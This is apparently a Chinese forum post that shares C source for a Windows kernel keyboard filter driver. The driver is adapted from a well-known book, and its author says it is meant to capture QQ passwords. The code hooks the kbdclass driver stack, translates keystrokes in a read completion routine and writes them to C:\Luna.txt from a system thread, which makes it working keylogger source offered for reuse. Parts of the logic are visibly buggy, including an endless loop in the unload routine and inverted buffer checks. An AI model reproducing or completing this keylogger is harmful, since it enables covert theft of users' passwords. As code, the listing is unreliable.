寒江独钓键盘过滤,修改了下,过滤QQ密码写入buff,有 回车 或者buff满写入文件,因为irp完成,irp对应的内存快回收,所以用全局缓冲区。开启一个线程写入,开始打算用队例一个一个处理irp的,但是发现那样比较缓慢,只好这样了。。创建进程回调代码加几行就行,这里没写,因为代码丢失了,算是个大概的代码吧。给初学的分享下。有错指出,谢谢。
前辈们不要见笑了。
struct.h
/************************************/
//author:DuanYueming
//data: 02/05/2015
//File: Lstruct.h
/************************************/
#ifndef _LSTRUCT_H_
#define _LSTRUCT_H_
typedef struct _DEVICE_EXTENSION
{
PDEVICE_OBJECT pDeviceObj;
PDEVICE_OBJECT pAttachDev; //上层设备
PDEVICE_OBJECT pLowDevice; //底层设备
PDEVICE_OBJECT pStorageDev; //存储的设备
PDEVICE_OBJECT pTarDevice; //目标设备
UNICODE_STRING MyDeviceName;
UNICODE_STRING MyDeviceSym;
ULONG pMyDevFlg;
IO_REMOVE_LOCK MoveLock;
}DEVICE_EXTENSION,*PDEVICE_EXTENSION;
typedef struct _MultVar
{
PVOID pBuff;
KEVENT WaitEvent;
ULONG Length;
}MULTVAR,*PMULTVAR;
#define BUFF_SIZE 256
typedef struct _MY_BUFF
{
PUCHAR pBuf;
int MaxSize;
int CurSize;
int Offset;
}MYBUFF,*PMYBUFF;
typedef struct _MY_DATA
{
PIRP Irp;
PVOID pBuff;
LIST_ENTRY ListEntry;
}MY_DATA,*PMYDATA;
#define MyDeviceFlags 'LUNA' #define MyCdoDeviceFlags 'LCdo' #define RemoveTag 'Lmn' #define DELAY_ONE_MICROSECOND (-10) #define DELAY_ONE_MILLISECOND (DELAY_ONE_MICROSECOND*1000) #define DELAY_ONE_SECOND (DELAY_ONE_MILLISECOND*1000) #define IS_MY_DEVICE_OBJECT(_obj) (((PDEVICE_EXTENSION)_obj->DeviceExtension)->pMyDevFlg == MyCdoDeviceFlags || PDEVICE_EXTENSION(_obj->DeviceExtension)->pMyDevFlg == MyDeviceFlags) #define IS_MY_CONTROL_DEVICE(_obj) (((PDEVICE_EXTENSION)_obj->DeviceExtension)->pMyDevFlg == MyCdoDeviceFlags)
/********未归档函数************/ NTSTATUS ObReferenceObjectByName( PUNICODE_STRING ObjectName, ULONG Attributes, PACCESS_STATE AccessState, ACCESS_MASK DesiredAccess, POBJECT_TYPE ObjectType, KPROCESSOR_MODE AccessMode, PVOID ParseContext, PVOID *Object ); extern POBJECT_TYPE *IoDriverObjectType;
NTSTATUS LQueryObjectName(PVOID Lobject,PUNICODE_STRING name)//查询文件名
{
NTSTATUS status;
POBJECT_NAME_INFORMATION pBuff;
WCHAR cache[64];
ULONG NeedLength;
pBuff = (POBJECT_NAME_INFORMATION)cache;
status = ObQueryNameString(Lobject,pBuff,64*sizeof(WCHAR),&NeedLength);
if (status == STATUS_INFO_LENGTH_MISMATCH)
{
pBuff =(POBJECT_NAME_INFORMATION) ExAllocatePool(NonPagedPool,NeedLength);
if (pBuff == NULL)
{
return STATUS_INSUFFICIENT_RESOURCES;
}
RtlZeroMemory(pBuff,NeedLength);
status = ObQueryNameString(Lobject,pBuff,NeedLength,&NeedLength);
}
name->Length = 0;
RtlCopyUnicodeString(name,&pBuff->Name);
return status;
}
VOID LUnInstallDriver(PDRIVER_OBJECT pDriverObject)
{
PDEVICE_EXTENSION pDevExt;
PRKTHREAD CurrentThread;
LARGE_INTEGER time;
PDEVICE_OBJECT pDevObj;
time = RtlConvertLongToLargeInteger(100*DELAY_ONE_SECOND);
pDevObj = pDriverObject->DeviceObject;
CurrentThread = KeGetCurrentThread();
KeSetPriorityThread(CurrentThread,LOW_REALTIME_PRIORITY);
while (pDevObj)
{
pDevExt =(PDEVICE_EXTENSION) pDevObj->DeviceExtension;
IoDeleteSymbolicLink(&pDevExt->MyDeviceSym);
pDevObj = pDevObj->NextDevice;
IoDetachDevice(pDevExt->pLowDevice);
IoDeleteDevice(pDevExt->pDeviceObj);
}
while (1)
{
}
KdPrint(("Driver UnInstall Complete,leave
"));
}
NTSTATUS LDispatchRoutine(PDEVICE_OBJECT pDeviceObject,PIRP pIrp)
{
PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(pIrp);
IoSkipCurrentIrpStackLocation(pIrp);
return IoCallDriver(((PDEVICE_EXTENSION)pDeviceObject->DeviceExtension)->pLowDevice,pIrp);
}
以下是代码:
#include "QFilter.h"
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pRegistryPath)
{
int i;
NTSTATUS status;
HANDLE Thread;
/********初始化全局变量***********/
IsWriteData = FALSE;
IsNeedFilter = FALSE;
InitializeListHead(&g_list);
g_buff =(PMYBUFF) ExAllocatePool(NonPagedPool,sizeof(MYBUFF));
if (g_buff ==NULL)
{
KdPrint(("no through memory
"));
return 0;
}
else
{
g_buff->pBuf =(PUCHAR)ExAllocatePool(NonPagedPool,BUFF_SIZE);
ASSERT(g_buff->pBuf);
g_buff->MaxSize = BUFF_SIZE;
g_buff->Offset = 0;
g_buff->CurSize = 0;
}
/********初始化全局变量***********/
pDriverObject->DriverUnload = LUnInstallDriver;
for (i = 0;i <IRP_MJ_MAXIMUM_FUNCTION;i++)
{
pDriverObject->MajorFunction[i] = LDispatchRoutine;
}
pDriverObject->MajorFunction[IRP_MJ_READ] = ReadRoutine;
pDriverObject->MajorFunction[IRP_MJ_POWER] = PowerRoutine;
pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ContrlRoutine;
//pDriverObject->MajorFunction[IRP_MJ_CLOSE] = CloseIrp;
status = CreateMyCDODevice(pDriverObject);
if (!NT_SUCCESS(status))
{
return status;
}
status = BindKbdDriver(pDriverObject);
if (!NT_SUCCESS(status))
{
return status;
}
status = PsCreateSystemThread(&Thread,GENERIC_ALL,NULL,NULL,NULL,ProcessIrp,NULL);
if (!NT_SUCCESS(status))
{
KdPrint(("Create Thread Failed
"));
return status;
}
KdPrint(("Start Kbd Filter SuccessFuly
"));
return STATUS_SUCCESS;
}
VOID ProcessIrp(PVOID pContext)
{
// PMYDATA data;
PVOID buff = NULL;
for (;;)
{
// PLIST_ENTRY HeadData = RemoveHeadList(&g_list);
// data = CONTAINING_RECORD(HeadData,MY_DATA,ListEntry);
if (IsWriteData == TRUE&& g_buff->pBuf != NULL)
{
KdPrint(("hehehehe
"));
KdPrint(("111
"));
KdPrint(("2222
"));
MyWriteDataFile();
RtlZeroMemory(g_buff->pBuf,g_buff->MaxSize);
g_buff->CurSize = 0;
g_buff->Offset = 0;
}
}
}
NTSTATUS PowerRoutine(PDEVICE_OBJECT pDeviceObj,PIRP pIrp)
{
PoStartNextPowerIrp(pIrp);
IoSkipCurrentIrpStackLocation(pIrp);
return PoCallDriver(((PDEVICE_EXTENSION)pDeviceObj->DeviceExtension)->pLowDevice,pIrp);
}
NTSTATUS CreateMyCDODevice(PDRIVER_OBJECT pDriverObj)
{
NTSTATUS status;
UNICODE_STRING DevSym;
UNICODE_STRING DevName;
PDEVICE_OBJECT pNewDev;
PDEVICE_EXTENSION pDevExt;
RtlInitUnicodeString(&DevName,L"\Device\QFilter");
status = IoCreateDevice(pDriverObj,sizeof(DEVICE_EXTENSION),&DevName,FILE_DEVICE_UNKNOWN,0,TRUE,&pNewDev);
if (!NT_SUCCESS(status))
{
KdPrint(("Create CDO DevObj Failed
"));
return status;
}
RtlInitUnicodeString(&DevSym,L"\??\QFilterSym");
status = IoCreateSymbolicLink(&DevSym,&DevName);
if (!NT_SUCCESS(status))
{
KdPrint(("Create Cdo Symbolic Failed
"));
IoDeleteDevice(pNewDev);
return status;
}
pNewDev->Flags |=DO_BUFFERED_IO;
pDevExt = (PDEVICE_EXTENSION)pNewDev->DeviceExtension;
pDevExt->pMyDevFlg = MyCdoDeviceFlags;
pDevExt->MyDeviceName = DevName;
pDevExt->pDeviceObj = pNewDev;
pDevExt->MyDeviceSym = DevSym;
return STATUS_SUCCESS;
}
NTSTATUS BindKbdDriver(PDRIVER_OBJECT pDriverObj)
{
UNICODE_STRING kbdClass;
PDEVICE_OBJECT pNewDev;
PDEVICE_OBJECT pTarDev;
PDEVICE_OBJECT pLowDev;
PDEVICE_EXTENSION pDevExt;
PDRIVER_OBJECT pKbdDrOb;
NTSTATUS status = STATUS_SUCCESS;
RtlInitUnicodeString(&kbdClass,L"\Driver\kbdclass");
status = ObReferenceObjectByName(&kbdClass,OBJ_CASE_INSENSITIVE,NULL,0,*IoDriverObjectType,KernelMode,NULL,(PVOID*)&pKbdDrOb);
if (!NT_SUCCESS(status))
{
KdPrint(("Load KbdObj Failed :%x
",status));
return status;
}
ObDereferenceObject(pKbdDrOb);
pTarDev = pKbdDrOb->DeviceObject;
while (pTarDev)
{
status = IoCreateDevice(pDriverObj,sizeof(DEVICE_EXTENSION),NULL,pTarDev->DeviceType,pTarDev->Characteristics,FALSE,&pNewDev);
if (!NT_SUCCESS(status))
{
KdPrint(("Create Device Failed:%x
",status));
return status;
}
else
{
status = IoAttachDeviceToDeviceStackSafe(pNewDev,pTarDev,&pLowDev);
if (!NT_SUCCESS(status))
{
KdPrint(("Bind Failed
"));
return status;
}
pDevExt = (PDEVICE_EXTENSION)pNewDev->DeviceExtension;
pNewDev->Flags |= pLowDev->Flags&(DO_BUFFERED_IO | DO_DIRECT_IO |DO_POWER_PAGABLE);
pNewDev->Flags &= ~DO_DEVICE_INITIALIZING;
pDevExt->pDeviceObj = pNewDev;
pDevExt->pMyDevFlg = MyDeviceFlags;
pDevExt->pLowDevice = pLowDev;
pDevExt->pAttachDev = pTarDev;
pNewDev->StackSize = pDevExt->pLowDevice->StackSize+1;
//IoInitializeRemoveLock(&pDevExt->MoveLock,0,0,0);
}
pTarDev = pTarDev->NextDevice;
}
RtlInitUnicodeString(&FileName,L"\DosDevices\C:\Luna.txt");
KdPrint(("Complete Device Bind
"));
return STATUS_SUCCESS;
}
VOID MyWriteDataFile()
{
HANDLE handl;
OBJECT_ATTRIBUTES objAttr;
IO_STATUS_BLOCK block;
NTSTATUS status;
InitializeObjectAttributes(&objAttr,&FileName,OBJ_CASE_INSENSITIVE,NULL,NULL);
status = ZwCreateFile(&handl,GENERIC_WRITE,&objAttr,&block,NULL,FILE_ATTRIBUTE_NORMAL,0,FILE_OPEN_IF,FILE_SYNCHRONOUS_IO_NONALERT,NULL,0);
if (!NT_SUCCESS(status))
{
KdPrint(("Create File Storage data Failed:%x",status));
return;
}
status = ZwWriteFile(handl,NULL,NULL,NULL,&block,g_buff->pBuf,g_buff->CurSize,0,NULL);
if (!NT_SUCCESS(status))
{
KdPrint(("WriteFile Failed:%X
",status));
ZwClose(handl);
return;
}
KdPrint((" code:%C
",g_buff->pBuf));
ZwClose(handl);
}
NTSTATUS ReadCompleteFun(PDEVICE_OBJECT pDeviceObj,PIRP pIrp,PVOID pContext)
{
ULONG KeyStructNum;
PKEYBOARD_INPUT_DATA ptr;
ULONG i;
UCHAR ASCIICODE;
if(/*IsNeedFilter &&*/NT_SUCCESS(pIrp->IoStatus.Status) )
{
KeyStructNum = pIrp->IoStatus.Information/(pIrp->IoStatus.Information/sizeof(KEYBOARD_INPUT_DATA));
ptr =(PKEYBOARD_INPUT_DATA) pIrp->AssociatedIrp.SystemBuffer;
for (i =0 ;i <KeyStructNum;++i)
{
ASCIICODE = print_keystroke(ptr[i].MakeCode);
if(g_buff->Offset >= (BUFF_SIZE-(5*UCHARSIZE)) || ASCIICODE == '0x0D')
{
KdPrint(("steup write data!!!!!!!!!!!!!!!!!!!
"));
IsWriteData =TRUE;
RtlCopyMemory(((g_buff->pBuf)+(g_buff->Offset)),&ASCIICODE,UCHARSIZE);
g_buff->Offset += UCHARSIZE;
g_buff->CurSize +=UCHARSIZE;
}
else
{
IsWriteData =FALSE;
KdPrint(("------buff small---Start Write Data to File--
"));
}
}
}
if (pIrp->PendingReturned)
{
IoMarkIrpPending(pIrp);
}
return pIrp->IoStatus.Status;
}
NTSTATUS ReadRoutine(PDEVICE_OBJECT pDeviceObj,PIRP pIrp)
{
PIO_STACK_LOCATION stack;
NTSTATUS status = STATUS_SUCCESS;
if (pIrp->CurrentLocation ==1)
{
pIrp->IoStatus.Status = STATUS_INVALID_DEVICE_REQUEST;
pIrp->IoStatus.Information = 0;
IoCompleteRequest(pIrp,IO_NO_INCREMENT);
return STATUS_INVALID_DEVICE_REQUEST;
}
if (IS_MY_CONTROL_DEVICE(pDeviceObj))
{
pIrp->IoStatus.Status = STATUS_SUCCESS;
pIrp->IoStatus.Information = 0;
IoCompleteRequest(pIrp,IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
stack = IoGetCurrentIrpStackLocation(pIrp);
IoCopyCurrentIrpStackLocationToNext(pIrp);
IoSetCompletionRoutine(pIrp,ReadCompleteFun,NULL,TRUE,TRUE,TRUE);
return IoCallDriver(((PDEVICE_EXTENSION)pDeviceObj->DeviceExtension)->pLowDevice,pIrp);
}
NTSTATUS ContrlRoutine(PDEVICE_OBJECT pDeviceObj,PIRP pIrp)
{
PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(pIrp);
if (IS_MY_CONTROL_DEVICE(pDeviceObj))
{
switch(stack->Parameters.DeviceIoControl.IoControlCode)
{
}
}
switch(stack->Parameters.DeviceIoControl.IoControlCode)
{
default:
IoSkipCurrentIrpStackLocation(pIrp);
return IoCallDriver(((PDEVICE_EXTENSION)pDeviceObj->DeviceExtension)->pLowDevice,pIrp);
}
}